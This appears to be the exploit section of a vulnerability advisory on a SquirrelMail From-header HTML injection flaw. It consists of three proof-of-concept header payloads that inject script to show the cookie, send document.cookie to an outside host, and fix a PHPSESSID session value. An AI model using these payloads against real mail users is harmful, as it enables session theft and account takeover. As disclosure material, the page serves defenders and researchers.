• info
• discussion
• exploit
• solution
• references

SquirrelMail From Email Header HTML Injection Vulnerability

No exploit is required to leverage this issue. The following 'from' field proof of concepts have been provided:

From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>

From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><>